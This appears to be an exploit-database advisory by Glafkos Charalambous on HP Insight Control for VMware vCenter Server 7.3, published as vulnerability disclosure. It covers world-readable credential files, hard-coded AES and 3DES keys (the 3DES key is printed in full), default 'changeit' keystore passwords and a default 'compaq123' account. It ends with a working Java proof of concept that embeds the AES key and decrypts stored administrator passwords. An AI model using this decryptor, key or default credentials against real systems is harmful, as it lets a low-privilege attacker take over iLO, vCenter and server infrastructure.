HP Insight Control For VMware vCenter Server 7.3 Insecure Permissions
Posted on 29 December 2017
/* Exploit Title: HP Insight Control for VMware vCenter Server Multiple Vulnerabilities Date: 11/05/2014 Author: Glafkos Charalambous Version: 7.3 Vendor: HP Vendor URL: http://www.hpe.com HP Case: SSRT101619 Product Description: HP Insight Control for VMware vCenter Server (Insight Control for vCenter) is a single integrated application that you use to manage ProLiant servers and/or HP storage systems. The application consists of four modules. The core module is required along with at least one of the three optional components. Impact: A low privilege attacker can read sensitive information files, decrypt all configuration server passwords and gain access to the above systems which in turn lead to the compromise of the whole infrastructure. Vulnerabilities: Local Insecure File Permissions Vulnerability A local attacker can exploit this issue by gaining access to low privileged readable files and extracting sensitive information. VMware vCenter Physical and Virtual Infrastructure configured servers include IP Addresses, Usernames and Encrypted passwords C:Program Files (x86)HPHP Insight Control for vCentericvchpcspassword.xml Ex: <password> <username>Administrator</username> <epassword>1Od6BZ6oCIkr5HY*********4F0Za0DJVR3tcDcwA=</epassword> <host>172.30.8.101</host> <type>Onboard Administrator</type> <id>beae31de-fdf8-11e2-9c3e-005056ae52ee</id> </password> <password> <username>root</username> <epassword>q75k41lRU+RRQyuk*********QUGjPrB2l6+8VmiW1I=</epassword> <host>172.30.8.161</host> <type>ProLiant Server</type> <id>f0df9f00-fdf8-11e2-bf51-005056ae52ee</id> </password> <password> <username>Administrator</username> <epassword>BC6j1QquVE1p*********hLdHMUOfRhcMLoE=</epassword> <host>172.30.8.129</host> <type>iLO</type> <id>f7f0fd0f-0b28-11e3-8753-005056ae52ee</id> </password> <password> <username>vadmin</username> <epassword>kbdDWTHKDfx***********49eI93rDL+xRsJu1V8=</epassword> <host>172.30.8.198</host> <type>vCenter</type> <id>d6c21e0f-99f5-11e3-ad68-005056ae52ee</id> </password> C:Program Files (x86)HPHP Insight Control for vCentericvcuimconfig.json Ex: "db": { // Local Postgress "username": "ic4vcdb", "ip": "localhost", "password": "qoelX2yfccmhtDdsHOKAE*********************JXbUFK4ANHoyznp4niXWJzx", "port": "3506" }, "vcenters": [ { "username": "vadmin", "ip": "172.30.9.183", "password": "dmNsOek/My2dND7*************/RxgMe/30JJ2nTI=" } Use of Hard-Coded Cryptographic Keys Java EE Enteprise Archive (EAR) Files containing hard-coded AES CBC 128bit and 3DES encryption keys that are being used to encrypt configuration files which include password information C:Program Files (x86)HPHP Insight Control for vCenterJBossstandalonedeploymentsapp_hpicsm_ear.ear C:Program Files (x86)HPHP Insight Control for vCenterJBossstandalonedeploymentscredentialStore_ear.ear Etc.. Files containing Usernames and Encrypted 3DES Passwords (3DES Hardcoded Key: THr@winG s*m3 junk !$$248$#*&^) C:Program Files (x86)HPHP Insight Control for vCenterJBossstandaloneconfigurationhp_roles.properties C:Program Files (x86)HPHP Insight Control for vCenterJBossstandaloneconfigurationhp_users.properties C:Program Files (x86)HPHP Insight Control for vCenterJBossstandaloneconfigurationmgmt-users.properties Use of default Keystore / Certificate Private Key Password Keystore and PKCS #12 certificate containing private keys using a default password of "changeit" C:Program Files (x86)HPHP Insight Control for vCenterJBossstandaloneconfigurationvasa.keystore (Default keystore pass changeit) C:Program Files (x86)HPHP Insight Control for vCenterJBossstandaloneconfigurationserver.p12 (Default password changeit) Use of default password of HP Common Services Password <username>compaq</username> <epassword>nhEeBy2mlbTbkitvVtAt2E0mnS5SXjCBE3JKtTGKru4=</epassword> = compaq123 <host>*</host> <type>HP Common Services</type> PoC AES-128-CBC Password Decryption */ import java.security.GeneralSecurityException; import java.security.Key; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import org.apache.commons.net.util.Base64; public class Start { private static final byte[] IV = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; private static final byte[] KEY = { 116, 111, toUnsigned(155), 34, toUnsigned(240), 47, 126, toUnsigned(157), 19, 33, 75, 32, 26, 27, 122, toUnsigned(134) }; public static void main(String[] args) { String ePassword = "qoelX2yfccmhtDdsHOKAE2W8R82buPd6jQX6AlqJ6JXbUFK4ANHoyznp4niXWJzx"; String decryptedPassword = decrypt(ePassword); System.out.println("Password is: " + decryptedPassword); } public static String decrypt(String encryptedString) { try { Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding"); Key key = new SecretKeySpec(KEY, 0, KEY.length, "AES"); IvParameterSpec iv = new IvParameterSpec(IV, 0, IV.length); cipher.init(2, key, iv); byte[] encryptedBytes = Base64.decodeBase64(encryptedString.getBytes()); cipher.update(encryptedBytes); byte[] decryptedBytes = cipher.doFinal(encryptedBytes); String decryptedString = new String(decryptedBytes, 16, decryptedBytes.length - 16); return decryptedString.trim(); } catch (GeneralSecurityException e) { System.out.println("Password Decryption Error"); } return null; } private static final byte toUnsigned(int value) { if (value < 128) { return (byte)value; } return (byte)(value - 256); } }
